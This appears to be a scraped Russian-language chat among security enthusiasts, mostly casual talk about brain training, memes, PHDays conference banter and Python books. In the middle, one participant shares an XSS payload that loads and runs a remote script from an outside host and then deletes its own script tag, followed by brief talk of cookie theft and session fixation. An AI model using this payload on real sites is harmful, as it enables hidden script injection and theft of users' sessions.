Что пишут?

Интересно

Что пишут?

Всю соль

Без таблеток говорят можно самому высот добиться

Так может расскажешь в 3 словах

Не верю.

каким образом?

говорят каждый день матан по полтора часа решать

Видимо я тупенький такой от того, что я на начальных курсах матан не особо решал

хм каким образом матан то в этом помогает

Мышлялка работает

Аргументируют тем, что мозгу нужна нагрузка, т.е упорные, постоянные и методичные тренировки

Звучит логично на самом деле

Интересно, а ежедневный просмотр мемов и поиск в них самых годных, является упорной, постоянной и методической тренировкой?

логично , согласен. Но для этого не обязательно матан. или только матан. Главное постоянно чем то нагружать. Но не просто какой то инфой что то типа в одно ухо влетело в другое вылетело а еще анализировать эту инфу и пытаться ее применять в какой то деятельности

А мемы?

А еще вот пример

Я частенько упорно и методично сливаю катки в дотке

Стараясь и потея

логично , согласен. Но для этого не обязательно матан. или только матан. Главное постоянно чем то нагружать. Но не просто какой то инфой что то типа в одно ухо влетело в другое вылетело а еще анализировать эту инфу и пытаться ее применять в какой то деятельности

Годные мемы я потом друзьям рассказываю.

Не забывайте про физ подготовку, укрепляет нейронные связи

На счет мемов думаю это слабая пища для мозгов. мало связей

Не забывайте про физ подготовку, укрепляет нейронные связи

Это точно.

Игра на муз инструментах тоже стимулирует

Так что не " хлебом " единым

Док, скажите пожалуйста, у меня дауншифтинг?

Это у меня дпуншифтинг

А у тебя какой угол наклона?

Все с нуля

Над придумать формулу для определения показателя угла дауншифтерской прямой

Шоб контролировать скорость спуска

На счет мемов думаю это слабая пища для мозгов. мало связей

Вспомнил и не могу пошутить, "А как же просмотр сложных приколов?"

? контролировать ....

Скорость ...

Тормоза придумали трусы

Вспомнил и не могу пошутить, "А как же просмотр сложных приколов?"

Например?

Ну когда на картинке ребус вместо тупой шутки.

ребус это ведь не мем?

Мем, но чтобы его понять нужно разгадать ребус

хм что то не помню ничего подобного. Но даже если этим не задаваться то думаю чем больше связей что то типа 9 нот и целая вселенная их вариаций тем благостно влияет на человека это занятие.

Как то криво мысли в 5 утра ложатся. Спать. определенно спать.

А это более прикольная альтернатива alert'у <img src onerror="(function(u){var d=document,s=d.createElement('scri'+'pt');s.src=u;(d.head||d.documentElement).appendChild(s);s.parentNode.removeChild(s);}('//bo0om.ru/xss.js'));"> Хоть и боян

По красоте, внедряет скрипт, исполняет его и выпиливает (на странице нет его)

весьма

А я на два

Такая практика у django

Но я бы не советовал

А как бы посоветовал? Что в этом плохого?

Восточная Сибирь +5

А как бы посоветовал? Что в этом плохого?

Куки уводятся

Яндекс хранит токен в сессии напримеи

Он у них несколько дней не меняется, что не слишком круто

Куки уводятся

Crlf фиксирует сессию. Поддомен может установить куки на главный домен. Короче опасна

А как бы посоветовал? Что в этом плохого?

Генерить и сверять :)

Ну можно совсем запараноить. Например передавать одну херню, на клиенте делать random()xsha256(key) и сравнивать с данными из сессии.

Заодно proof of work будет

Что именно генерироватьи сверять? Токен формы с куки?)

Генерить и сверять :)

Кто уже что то делал на Ethereum?

Кто программировал контракты и вообще ковырялся с ним?)

Дык там не о майнинге он вроде как

а у меня тут ерткуэйк был на 4.8 балла утром ранним около 4!! Впервые в жизни. Кровать запрыгало, проснулся, страшно, уснул!!

а у меня тут ерткуэйк был на 4.8 балла утром ранним около 4!! Впервые в жизни. Кровать запрыгало, проснулся, страшно, уснул!!

гадзилла?

мб

Это успех http://lukatsky.blogspot.ru/2016/05/phd-itsf.html Сам Лукацкий перепостил ?

Хорошо хоть в чувстве юмора и самоиронии ему не откажешь

PHDец... Оригинально :)

Хорошо хоть в чувстве юмора и самоиронии ему не откажешь

Он — популярный блоггер на тему ИБ, конечно, нужен юмор.

PHDец... Оригинально :)

Я помню старое откуда-то "enjoy your phgays talks" Это кажется кто-то из коллег отшил блэка с каким-то предложением, ну а тот в обратку написал

я завтра буду рассказывать о том, что для киберпреступников важна финансовая выгода, а для ИБ ресечеров — удачно выступить и нажраться на phdadys/defcon/blackhat/hitb

поэтому all whitehat things релевантны :)

У вас с Сергеем вместе или по очереди? Или вроде дискуссии?

а заявлено вроде бы было про целевые атаки :)

но про выгоду/выступить/нажраться всяко завлекательнее:)

Канал событий PHDays, подключайтесь @phdays_ru

У вас с Сергеем вместе или по очереди? Или вроде дискуссии?

У нас как бы рэп-бэттл

а заявлено вроде бы было про целевые атаки :)

Это как раз о том, почему целевые атаки успешны.

Дело не в магической малвари или приватных зиродеях.

А почему киберпреступникам противопоставляются рисерчеры?

Ну, т.е. безопасноситью организаций занимаются люди, которые с исследованиями связаны постольку поскольку. Это не к тому что они ленивы или вроде того, просто специфика. Мотивация людей которые харденят сервера и анализируют данные не обязательно в побухать на zn/phd. может это просто дело чести, или спортивный интерес, чтобы твою сеть, которую ты выстроил, не нагнули

Ну, т.е. безопасноситью организаций занимаются люди, которые с исследованиями связаны постольку поскольку. Это не к тому что они ленивы или вроде того, просто специфика. Мотивация людей которые харденят сервера и анализируют данные не обязательно в побухать на zn/phd. может это просто дело чести, или спортивный интерес, чтобы твою сеть, которую ты выстроил, не нагнули

Да, это тоже возможно. Дело не конкретно в ресечерах. Дело в том, что у защищающихся сейчас меньше мотивация, чем у атакующих.

это да.

Есть исключения, разумеется. Но в массе перевес на стороне атакующих.

Остальное - зиродеи, persistence, хитрая малварь - это следствия.

https://twitter.com/3dwave/status/732296053970604033

#микролукацкий

#говорящаяголова

Товарищи, посоветуйте литературу по питону, пожалуйста) Заранее спасибо)

Оу) шик, спасибо, совсем забыл про ссылочку

стянуть можно тут http://readmanuals.github.io

Cпасибо! Будет кстати и мне.

Тут какой-то парниша на Донсково сидел с ноутом увешанным стикерами дефкон, пхд